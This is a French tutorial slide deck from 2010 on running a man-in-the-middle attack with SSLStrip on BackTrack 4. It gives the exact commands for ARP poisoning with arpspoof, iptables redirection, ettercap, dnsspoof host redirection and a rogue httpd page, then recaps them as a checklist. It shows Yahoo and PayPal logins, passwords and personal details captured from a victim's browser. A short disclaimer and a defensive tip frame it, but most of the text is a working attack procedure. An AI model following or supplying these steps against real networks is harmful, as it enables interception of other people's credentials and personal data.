Miih Sslstrip Final

33
crack-wpa.fr 2010 1 .Pour rappel, il est interdit de tester un réseau sans l’accord de son propriétaire ! .Pour le bon déroulement de ce tuto, il est aussi interdit de fumer, de filmer dans la salle, ou de faire un appel à un ami. BONNE SÉANCE TUTO SSLSTRIP sous BT4 Final & Bonus. ARP Poisoning + DNS Spoof + httpd

Transcript of Miih Sslstrip Final

Page 1: Miih Sslstrip Final

crack-wpa.fr 2010 1

1° .Pour rappel, il est interdit de tester un réseau sans l’accord de son propriétaire !

2° .Pour le bon déroulement de ce tuto, il est aussi interdit de fumer, de filmer dans la

salle, ou de faire un appel à un ami.

BONNE SÉANCE

TUTO SSLSTRIP sous BT4 Final & Bonus. ARP Poisoning + DNS Spoof + httpd

Page 2: Miih Sslstrip Final

crack-wpa.fr 2010 2

TABLE DES MATIERES 1. INTRODUCTION. ……… I. Préface ……… II. Prérequis ……… III. Intro SSLStrip ……………… .a Https et SLL: quelques explications ……………… .b SSLStrip: la naissance de l’outils ……………… .c Comment on arrive sur du Https ……… IV. Intro Arp Poisoning - Dns Spoof - httpd 2. SSLSTRIP…LE CONTACT. ……… I. SLStrip à quoi ça ressemble ? ……… II. Avant on se prépare ! ……… III. Configuration ……… IV. SSLStrip en Pratique ………………… 1er Test sans SSLStrip ………………… 2eme Test avec SSLStrip ……… V. Les Logs

3. ARP POISONING - DNS SPOOF - HTTD. ……… I. Mini Intro ……… II. Les Etapes

4. RÉCAP DES COMMANDES. ……… I. SSLStrip ……… II. Arp Poisoning - Dns Spoof - httpd

1. INTRODUCTION I. Préface

. Pour commencer, ce tuto fait suite à une série dont voici le 1er épisode Mdk3 by Antares145, bien entendu ce lien est juste là à titre indicatif et donc pas nécessaire à la compréhension de ce tuto.

. Dans un souci de pédagogie purement ludique, je force volontairement sur le coté animation et je précise encore une fois que ces tutos doivent être ouvert au plus grand nombre. Bienvenue aux N00b’z.

. Il n’a rien d’exceptionnel en soi c’est juste une compilation de donnés déjà existantes, dixit le tuto SSLStrip de M1ck3y sur BT3. A quelques broutilles près, sur BT4 Final c’est la même chose.

. Certes pour les puristes et les habitués, pas besoin de toute cette mise en scène et de tout ce verbiage, vous pouvez donc accéder directement à la section 4. dans la Table des Matières. Pour les N00b’z, la visite continue... Onjoy !

II. Prérequis

. Tutoriel réalisé sous BackTrack 4 final.

. Une Maj de SSLStrip (facultatif, mais c’est toujours mieux d’avoir la dernière version)

. Les tests ont été effectués avec un adaptateur wifi usb Alfa AWUS036H 1000 mW.

Page 3: Miih Sslstrip Final

crack-wpa.fr 2010 3

III. Intro SSLStrip

. A travers ce tutoriel, nous allons voir comment il est possible de s'attaquer à une connexion encryptée (SSL) grâce à SSLStrip qui va rediriger tout le trafic https vers du http en donnant l'illusion à la victime qu'elle est bien sur une connexion sécurisée.

.a/ Https et SSL: quelques explications

. HTTPS pour (hyper text transfert protocol secured). Il est synonyme de connexion sécurisée et permet d'encrypter des données sensibles afin d'éviter une éventuelle interception des données, exemple les sites web bancaires. Grace à un système de certificats, le navigateur va pouvoir s'assurer que le site web auquel il est connecté est bien celui qu'il prétend être. Un tiers de confiance est utilisé pour cela, on l'appelle le CA (certificate authority). Pour résumer, c'est en comparant le certificat du site sur lequel il est connecté et le certificat du CA (le tiers de confiance) que le navigateur va s'assurer qu'il est bien connecté à un site sécurisé. Le http classique utilise le port 80. Le https utilise par défaut le port 443 Une fois connecté en https, les informations qui vont transiter entre le navigateur et le serveur web seront encryptées via SSL (secured socket layer), un protocole de cryptage très sur permettant de sécuriser les données.

.b/ SSLStrip: la naissance de l'outil

. SSLStrip est un outil développé par Moxie Marlinspike, il est né d'un constat simple: La majorité des utilisateurs ne regardent pas l'url affichée dans la barre d'adresse de leur navigateur, et quand il leur apparait un message d'erreur la plupart du temps ils clickent sur ok sans savoir ce qu'ils font.

. Les utilisateurs se fient à une impression, un sentiment, un ressenti basé sur ce qu'ils voient: - des indicateurs qui disent que la page est sécurisée - des icones avec un cadenas qui apparaissent ici ou là - la barre d'adresse qui change de couleur Lorsque ces éléments sont réunis, l'utilisateur pense que la page est sécurisée (et franchement quel lambda analyserait chaque page qu’il visite ?).

Page 4: Miih Sslstrip Final

crack-wpa.fr 2010 4

Donc quand on veut s'attaquer à du https, on fait en sorte de maintenir la confiance de l’utilisateur, et surtout de ne pas éveiller sa suspicion en affichant un message d'alerte disant que le certificat n'a pas été émis par une autorité approuvée ou autres messages qui pourraient paraitre anormale. En résumé, pour duper l'utilisateur il ne faut pas lui afficher de messages d'alerte, et le maintenir dans un environnement visuel qui va lui laisser penser qu'il est sur un site sécurisé.

Voici un schéma basique qui illustre son fonctionnement:

.c/ Comment les utilisateurs arrivent ils sur du https ?

. Très peu de personnes tapent directement https dans leur barre d'adresse, en fait les 2 façons classiques pour arriver sur du https lors d’une navigation sur le web, sont : - en clickant sur un lien - en suivant une redirection (302)

. En effet, la plupart des sites proposant un contenu sécurisé en https, nous font dans un premier temps passer par une page http (exemple: la page accueil) avant d'être redirigé vers une page sécurisée. C'est le cas sur les sites bancaires, sur google mail, paypal etc...

. SSLStrip ne va pas attaquer le https, il va attaquer le http. Il va transformer tous les liens https sur le poste victime en liens http, et garder en mémoire tout ce qui a changé en créant une map (carte). Résultat: - le serveur ne voit rien, pour lui la connexion est toujours encryptée - le client ne voit aucun message d'alerte dans son navigateur - l'attaquant peut sniffer toutes les données car elles transitent en clair

. Grace à ce procédé, il est très difficile de différencier la véritable page https cryptée via SSL de la fausse page http renvoyée par SSLStrip.

. Cela dit, comme on l'a évoqué, les utilisateurs sont habitués à voir une image de cadenas lorsqu'ils basculent sur une page sécurisée, cette icone représente à leurs yeux un gage de sécurité. SSLStrip va donc falsifier les réponses aux requêtes favicon du navigateur et afficher en guise de favicon un

petit cadenas (une favicon est la petite image située à gauche de la barre d'adresse du navigateur) :

Page 5: Miih Sslstrip Final

crack-wpa.fr 2010 5

Le Petit Bonus !

IV. Intro ARP Poisoning + DNS Spoof + HTTPD

Est-ce une obligation après SSLStrip ? Obligation… Bien sûr que non, tous deux ont une mission bien distincte et bien différente, l’un comme l’autre peuvent être utilisés séparément, mais on verra qu’ils ont en commun la méthode MITM.

…Dans ce cas pourquoi son utilité ? Utilité… Juste pour le coté ludique du challenge (cad : mettre une page de pwn). Pour voir les similitudes MITM sur une autre technique qu’ SSLStrip. Pour la culture générale. (…Et aussi, parce que j’en ai envie, et que j’fais s’que j’veux !)

Vu que c’est un petit Bonus, on ne va pas faire de tuto détaillé sur ce sujet, mais dans le cadre de notre "attaque" on va juste en expliquer vite fait le principe et s’axé plus précisément sur la mise en place du dispositif. Voici un schéma classique de connexion, un pc connecté en wifi sur un routeur pour surfer sur le web

La Mission :

Notre but est de se glisser subrepticement dans le réseau afin de récupérer le trafic et de rediriger la victime sur une page "pwnd" ou "piégée" via notre server httpd.

La Technique du MITM (Man in the Middle) : Et pour ce faire on va appliquer la méthode du MITM, c'est-à-dire qu’on va se placer entre la Victime et le point d’accès… Mais pour l’instant on ne parlera que du principe, la méthode sera pour plus tard.

ARP et ARP Poisoning : Ici un très bon explicatif sur l’ARP et ARP Poisoning, mais grosso modo ce qui faut retenir dans

notre cas c’est que l'ARP Poisoning va nous permettre de faire admettre légitimement notre MITM. (La Victime passe par notre machine en pensant que c’est le routeur et inversement contrairement proportionnel de même avec le routeur… Bref j’espère que j’ai été assez clair)

Page 6: Miih Sslstrip Final

crack-wpa.fr 2010 6

Le DNS Spoof :

Dans notre cas de figure il servira à faire croire à la Victime qu'il se trouve sur un site internet original, alors qu'il sera en réalité redirigé sur notre machine MITM et donc notre server.

Le rôle du Server HTTPD :

Une fois que notre dispositif de redirection est mis en place on va pouvoir faire en sorte que la Victime visite notre page "pwnd" ou piégée "métasploit ¹" via notre serveur, d’où son utilité. On pourrait éventuellement ne pas s’en servir mais le but n’est pas de faire juste de la simple redirection d’url.

¹ Bref, on s’est compris… Donc pour notre challenge ça sera juste une page "pwnd", dsl.

Maintenant qu’on en sait un peu plus, revenons a notre aventure !

Previously in MIH (Mdk3 by Antares145)

Page 7: Miih Sslstrip Final

crack-wpa.fr 2010 7

2. SSLSTRIP…PREMIER CONTACT

I. SSLStrip à quoi ça ressemble ? Etant donné qu’il est déjà installé sur BT4 on va pouvoir faire connaissance avec SslStrip :

A. Soit en passant par - Menu K Backtrack Privilege Escalation All SSLStrip

Une fenêtre Terminal SSLSTRIP s'ouvre en vous affichant directement toutes les commandes

B. Soit en ouvrant une Konsole de la barre des taches en bas à gauche, et on tape : root@bt :~# sslstrip -h

Page 8: Miih Sslstrip Final

crack-wpa.fr 2010 8

II. SSLStrip Préparation du Terrain

Maintenant qu'on a fait les présentations, on peut préparer le terrain. Et oui ! On n’arrive pas comme ça les mains dans les poches. Avant toute chose on se pose les bonnes questions.

A. Heuuu… C’est quoi mon matos ?

On sait déjà que pour ma part c’est un adaptateur wifi Alfa AWUS036H 1000 mW, mais afin d'avoir un peu plus d’infos sur le périphérique à utiliser, on fait un petit : root@bt :~# ifconfig

Mon alfa se trouve en (wlan0), et on a l'ip (192.168.168.1.98) c'est pas important mais bon à savoir.

B. Ok ! Mais c’est qui la victime ?

un scan avec nmap sur le réseau, histoire de trouver une cible : root@bt :~# nmap 192.168.1.0/24 Je vous mets directement le résultat : 192.168.1.99

On est presque paré il reste deux, trois bricoles à config et c’est parti.

Page 9: Miih Sslstrip Final

crack-wpa.fr 2010 9

III. SSLStrip et Configurations

A. Un peu de configuration pour faire de l'ARP Poisoning SSL, on va éditer le fichier "etter.conf" d'ettercap

...ok mais ou se trouve t'il ?

pour le savoir voici une manip très simple (parmi tant d'autre) on ouvre un autre Terminal, et on tape : root@bt :~# whereis etter.conf Vous aurez normalement la réponse suivante "etter: /etc/etter.conf" ce qui nous donne le chemin.

Afin d'éditer le fichier "etter.conf", ouvrez un autre Terminal et taper : root@bt :~# kate /etc/etter.conf sinon kwrite (autre éditeur de texte), ou nano (édition en console), font aussi l'affaire.

! Attention ! Pour les étourdis et pour ceux qui ne le savent pas, si vous ouvrez un terminal SSLStrip via Menu K Backtrack Privilege Escalation All SSLStrip, dans ce cas là ne lancez pas de commande "kate" ou "kwrite" dans le même Terminal qu’ SSLStrip, sauf si vous éditez avec "nano", car vous aurez l'erreur suivante :

Page 10: Miih Sslstrip Final

crack-wpa.fr 2010 10

Le fichier "etter.conf" ouvert, allez dans la section "Linux -> if you use iptables"

Enlevez le dièse '#' devant :

redir_command_on à la ligne 168 et redir_command_off à la ligne 169

Enregistrez et sortez.

Page 11: Miih Sslstrip Final

crack-wpa.fr 2010 11

B. On active l’Ip Forwarding et on lance le MITM. L'Ip forwarding permet de faire transiter des paquets d'une interface réseau à une autre.

Pour activer l'Ip forwarding, il faut ajouter la valeur 1 au fichier /proc/sys/net/ipv4/ip_forward

(cette valeur par défaut est à 0 ce qui signifie que l'Ip forwarding n'est pas activé). tapez : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

et on lance l'Arp Poisoning qui nous placera en situation de man in the middle sur le réseau : root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254 -i pour indiquer l’interface, donc wlan0 -t "target" pour indiquer la cible, donc 192.168.1.99 Suivi de l’host, donc dans ce cas l’AP 192.168.1.254

Arpsoof en action

C. La redirection du trafic avec iptables. Allez zou !.. Un peu de devoirs à faire a la maison Comprendre l’iptables et en ce qui nous

concerne la Cible REDIRECT

dans une nouvelle fenêtre Terminal, tapez : root@bt :~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 ou par exemple vous pouvez configurer un port différent, ex : 15000

Page 12: Miih Sslstrip Final

crack-wpa.fr 2010 12

IV. SSLStrip en pratique: test avec & sans SSLStrip

Prenons comme exemple la page login mail de Yahoo.com

Page 13: Miih Sslstrip Final

crack-wpa.fr 2010 13

1er test / sans SSLstrip On lance à la suite d’iptables la commande ettercap: root@bt :~# ettercap -T -q -i wlan0

-T = lance ettercap en mode texte / -q = mode silence, pour pas se taper les requêtes dans le Terminal / -i = pour signifier une interface + (mon interface = wlan0)

Et on vérifie ce qui se passe dans l'explorateur de notre cible, en retournant sur la page de login mail Yahoo.com

Alllaaarrrmmmeeee !!!

La plupart des outils permettant d'effectuer une attaque man in the middle sur du SSL (https) fournissent au navigateur de la machine victime un faux certificat SSL n'ayant pas été émis pour le site visité. Le résultat est un message d'alerte dont voici deux exemples:

Avec Firefox :

Page 14: Miih Sslstrip Final

crack-wpa.fr 2010 14

Avec IE :

On arrêter proprement l'attaque, il faut appuyer sur la touche " q " (…pas besoin de filtre parental, ce n’est qu’une touche sur un clavier)

2ème test / avec SSLstrip

Page 15: Miih Sslstrip Final

crack-wpa.fr 2010 15

(Inutile d’ouvrir un autre Terminal). Cette fois ci on lance la commande sslstrip: root@bt :~# sslstrip -a -k -f

! NOTE ! On a bien mis nos options : -a pour logger toute les requêtes SSL et http / -k pour la session / -f pour le favicon

…Pourquoi ne pas ajouter -l ? - Pour la simple raison qu’sslstrip écoute déjà par défaut le port 10000 - Petit rappel du 2.III.C, on a configuré la redirection du trafic iptables sur le port 10000, par contre si on l’avait configuré sur le port 15000, on aurait la commande suivante : root@bt :~# sslstrip -a -k -f -l 15000

Vous remarquerez qu’en lançant cette commande un fichier sslstrip.log a été créé sur le bureau.

Maintenant qu’ SSLStrip est lancé, on re-test la commande ettercap, on ouvre un autre Terminal: root@bt :~# ettercap -T -q -i wlan0

Page 16: Miih Sslstrip Final

crack-wpa.fr 2010 16

Et tous le monde fait Wouaaa !!!

Retournons voir notre cible… Et là ! C’est le bonheur et la stupéfaction car devant vos yeux ébahis et émerveillés vous contemplez enfin toute la magie d’ SSLStrip.

Test avec Firefox :

Login : [email protected]

Pass : ************

Page 17: Miih Sslstrip Final

crack-wpa.fr 2010 17

Bien venu sur l’interface web mail du Dr.Denfer

Test avec IE :

Pour le test on a volontairement mis un pass erroné

Page 18: Miih Sslstrip Final

crack-wpa.fr 2010 18

Résultat : on le connait, mais ce qui est intéressant c’est de voir le Terminal ou le fichier sslstrip.log

Mais qu’est ce qui ce passe de notre coté ‘MITM’ ?

Regardons un petit peu notre terminal

A. Ici l’ip 217.12.8.76 est c’elle de la page de login de Yahoo mail via Firefox (voir screen plus haut) sur lequel on a essayé de logger avec : l’adresse [email protected] et le pass Austin.Power

B. Ici c’est la même ip donc même page mais via IE, avec un pass erroné pour l’exemple : l’adresse [email protected] et le pass minimoi

Testé avec Firefox et IE sur un compte Yahoo… Et pourquoi pas sur un compte Paypal ? (Voir même lors de la création du compte, les infos qui transpirent pourrait bien nous surprendre)

Page 19: Miih Sslstrip Final

crack-wpa.fr 2010 19

…Fini je Payplus !

. Nous allons maintenant voir ce qu'il se passe avec Paypal... …Ouvrir un compte no soucy !

…Coté MITM ça donne quoi ?

Bref ! C’est la fête…

Page 20: Miih Sslstrip Final

crack-wpa.fr 2010 20

…Toujours aucun message d'alerte, bien au contraire. La victime va se connecter à son Paypal. Il arrive sur la page d'accueil, en http:

. L'utilisateur clique sur le bouton "Connectez-vous", c'est là qu'il devrait normalement être redirigé vers du https. Ici, on peut voir que la favicon représentant le cadenas est déjà affichée dans la barre d'adresse, et on pourrait donc se croire sur un site sécurisé. Voici la page de login:

Page 21: Miih Sslstrip Final

crack-wpa.fr 2010 21

. La différence se situe au niveau de la barre d'adresse de l’explorateur. La vraie page sécurisée affiche une adresse en https et la partie gauche de la barre devient verte (pour Paypal), en affichant le nom du propriétaire du certificat SSL.

. Par contre sur la page "stripped" ou "leurre", l'adresse est en http classique, et on peut voir un cadenas sur la gauche (ce n'est bien sur en réalité qu'une favicon, mais combien de personnes savent ce qu'est une favicon, et surtout combien de personnes sont suffisamment attentives pour remarquer ce genre de petit détail, en plus, jusqu'ici aucun message d'alerte n'a été affiché !). Notre cible continue à surfer, il valide son identifiant ainsi que son mot de passe et se retrouve donc en toute logique connecté à son compte Paypal.

. Dans un autre exemple il se peut aussi que vous arriviez sur une page de login http (ex 1 : hotmail), et de voir le https agir après que les identifiants soient validés : 2, (on voit un affichage du https d’une fraction de seconde avant la redirection sur le compte : 3).

Petit Récap. pour mieux ce prémunir

Il faut donc dans la majorité des cas : vérifier l’adresse (donc https), de vérifier si ce n’est pas un Favicon bidon (souvent c’est le logo du site en question), que la barre qui précède l’url soit une zone colorée (vert, bleu...)

Page 22: Miih Sslstrip Final

crack-wpa.fr 2010 22

V. Les Logs

…Ok on à les login/pass de comptes sur des sites qui sont censé être sécurisés… Et c’est tout ?

Oullllaaa une septique ! Je vois que tu es une coquine toi et que tu en veux encore plus. Dans un moment de grande mansuétude on va rajouter un tout p’tit bonus, mais juste parce que c’est toi. Ce coup ci ça ne concerne plus le Terminal, mais les logs.

Un mail rien de plus anodin, exemple :

Pendant le MITM un mail à été reçu "…et alors moi aussi je reçois des mail, c’est quoi le rapport ?", (Pour aller plus vite j’ai ciblé ma recherche, sinon lors d’une recherche à l’aveugle on ce tape une bonne partie du log à lire).

Page 23: Miih Sslstrip Final

crack-wpa.fr 2010 23

En ouvrant le fichier de sslstrip.log, on peut trouver ceci :

On fait tous un autre Wouaaaouu !!! Ça marche aussi avec Haaannn !!!

Page 24: Miih Sslstrip Final

crack-wpa.fr 2010 24

C’est-y pas mignon tout ça… J’en ai la larme à l’œil.

…Toujours pas convaincu ?

Vous vous rappelez certainement de la création du compte Paypal (voir screen plus haut), et si on jetait aussi un coup d’œil sur les logs ?

SECURE POST Data (www.paypal.com) Bref on aura compris d’où ça vien !

email=dr.denfer%40yahoo.fr donc j’en déduit que le login est [email protected]

password=Anstin.Power pass Austin.Power

Page 25: Miih Sslstrip Final

crack-wpa.fr 2010 25

Jusque là pas de quoi sauter au plafond on avait déjà ces infos dans le Terminal, mais si en plus on avait des infos perso sans se connecter sur le compte Paypal ;)

first_name=Dr&last_name=Denfer Dr Denfer

adresse1=rue+du+Paradis Rue du Paradis

zip=75000 code postal

city=DenferIsland la ville

PhoneNumber= le numéro de téléphone quand on le spécifie

Conclusion : On retrouve le login de l'utilisateur, le mot de passe (%40 est l'encodage ascii de @), le nom, prénom, adresse complète, numéro de téléphone

. Dans une transparence quasi parfaite... Ce tutoriel illustre une fois de plus le danger des attaques man in the middle, j'espère qu'il attirera votre attention sur le fait qu'il est extrêmement dangereux de se connecter à un réseau "unsecured", qu'il s'agisse d'un hotspot ou autre. Si vous n'êtes pas sure à 100% du réseau sur lequel vous êtes connecté, alors ne vous connectez pas à des sites sensibles, n'envoyez aucune donnée importante et surtout soyez toujours vigilant lorsque vous vous connectez à un site sécurisé, la barre d'adresse doit clairement indiquer https et non http.

3. BONUS ARP POISONING - DNS SPOOF - HTTD

I. Ici nous allons voir la mise en place du dispositif, mais si vous le faites dans la continuité d’SSLStrip sachez adapter vos étapes (ex : Si cela avait déjà été fait depuis le début, ça ne sert à rien de refaire un ifconfig, nmap, etc…).

Mais pour le principe j’explique la méthode depuis le début.

Page 26: Miih Sslstrip Final

crack-wpa.fr 2010 26

II. C’est parti mon kaïkaï !

A. On identifie la carte qui est connectée au net, ex : wlan0 : root@bt :~# ifconfig

B. On scan le réseau avec Nmap dans une Konsole, dans notre cas: root@bt :~# nmap 192.168.1.1/24

Résultat l’ip cible est 192.168.1.99

Toujours pareil

C. On lance "DSniff" dans - Menu K Backtrack Privilege Escalation All DSniff

Un Terminal s'ouvre et vous avez directement les commandes.

Page 27: Miih Sslstrip Final

crack-wpa.fr 2010 27

D. On lance l'ip forward dans le Terminal: root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

E. on va ouvrir un autre onglet: arpspoof -i interface -t IP-Victim IP-Routeur

-i + interface = signifie l’interface à utiliser -t = target/cible + ip-victime + ip-point d’accès

Et on tape: root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

F. On ouvre encore un autre onglet dans la console et on tape le contraire: arpspoof -i interface -t IP-Routeur IP-Victim

Donc: root@bt :~# arpspoof -i wlan0 -t 192.168.1.254 192.168.1.99

Page 28: Miih Sslstrip Final

crack-wpa.fr 2010 28

G. On crée sur le bureau un fichier "ex : redirection.host" et on y met les infos de redirection, ex:

192.168.1.98 google.fr 192.168.1.98 google. com 192.168.1.98 www.youtube.com Ou ex : (192.168.1.98 *.*) veut dire quel que soit le site ou ira la victime (bien entendu on parle de la racine de l’url), elle sera redirigé vers notre ip, donc quand une victime ira sur www.youtube.com, google.fr, etc… Elle sera automatiquement redirigée vers notre ip 192.168.1.98

H. On ouvre un autre onglet, on tape: root@bt :~# dnsspoof -i wlan0 -f redirection.host

I. pour la section serveur on place la page qui sera vu après la redirection, qu'on appellera "index.html", une simple page "pwnd" à mettre dans le dossier "var/www"

Page 29: Miih Sslstrip Final

crack-wpa.fr 2010 29

J. On lance le server HTTPD dans - Menu K Services HTTPD Start HTTPD

…Et on attend sagement que la cible visite une url de notre fichier redirection.host

Comme de par hasard !

Server HTTP2-D2 !

Page 30: Miih Sslstrip Final

crack-wpa.fr 2010 30

…Et si maintenant on allait faire un tour du coté de l’explorateur de notre cible ?

Google.fr

Google.com

www.youtube.com

Page 31: Miih Sslstrip Final

crack-wpa.fr 2010 31

www.crack-wpa.fr

Là par contre si on vérifie le fichier "redirection.host" crack-wpa.fr n’en fait pas parti et donc on peut y accéder (…Il manquerait plus que ça !)

4. RÉCAP DES COMMANDES I. SSLStrip - Commandes

A. Connaitre son matos : root@bt :~# ifconfig

B. Scanner le réseau : root@bt :~# nmap 192.168.1.0/24

C. Pour l’aide : root@bt :~# sslstrip –h

D. Config etter.conf d’ettercap

- Trouver : root@bt :~# whereis etter.conf - Ouvrir le fichier : root@bt :~# kate /etc/etter.conf - Allez dans la section "Linux -> if you use iptables", enlevez le dièse '#' devant :

redir_command_on à la ligne 168 et redir_command_off à la ligne 169

E. Activez l'ip forwarding : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

F. On lance arpspoof : root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254 -i pour indiquer l’interface, donc wlan0 -t pour indiquer la cible, donc 192.168.1.99 Suivi de l’host, donc dans ce cas l’AP 192.168.1.254

Page 32: Miih Sslstrip Final

crack-wpa.fr 2010 32

G. Définir iptables : root@bt :~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 H. On lance sslstrip : root@bt :~# sslstrip -a -k –f

-a pour logger toute les requêtes SSL et http -k pour la session -f pour le favicon -l pour le port en écoute 1000 par défaut (si différent, configurez aussi iptables) sslstrip.log fichier de log par défaut sur le bureau (si différent, commande -w)

I. On lance Ettercap : root@bt :~# ettercap -T -q -i wlan0

-T = lance ettercap en mode texte -q = mode silence, pour pas se taper les requêtes dans le Terminal -i = pour signifier une interface + (mon interface = wlan0)

II. ARP Poisoning - Dns Spoof - HTTPD - Commandes

A. Connaitre son matos : root@bt :~# ifconfig

B. Scanner le réseau : root@bt :~# nmap 192.168.1.0/24

C. On lance "DSniff" : Menu K Backtrack Privilege Escalation All DSniff

D. Activez l'ip forwarding : root@bt :~# echo 1 > /proc/sys/net/ipv4/ip_forward

E. On lance arpsoof : arpspoof -i interface -t IP-Victim IP-Routeur

-i pour indiquer l’interface, donc wlan0 -t pour indiquer la cible, donc 192.168.1.99 Suivi de l’host, donc dans ce cas l’AP 192.168.1.254 Et on tape: root@bt :~# arpspoof -i wlan0 -t 192.168.1.99 192.168.1.254

On ouvre un autre onglet et on inverse : arpspoof -i interface -t IP-Routeur IP-Victim Donc: root@bt :~# arpspoof -i wlan0 -t 192.168.1.254 192.168.1.99

F. On crée un fichier "ex : redirection.host" et on met les infos de redirection :

192.168.1.98 google.fr 192.168.1.98 google. Com 192.168.1.98 www.youtube.com 192.168.1.98 www.crack-wpa.fr

G. On lance dnspoof : root@bt :~# dnsspoof -i wlan0 -f redirection.host

H. Pour la section serveur : On place la page qui sera vu après la redirection, qu'on appellera

"index.html", une simple page "pwnd" à mettre dans "var/www".

I. On lance le server HTTPD : Menu K Services HTTPD Start HTTPD

J. …That’s all !

Page 33: Miih Sslstrip Final

crack-wpa.fr 2010 33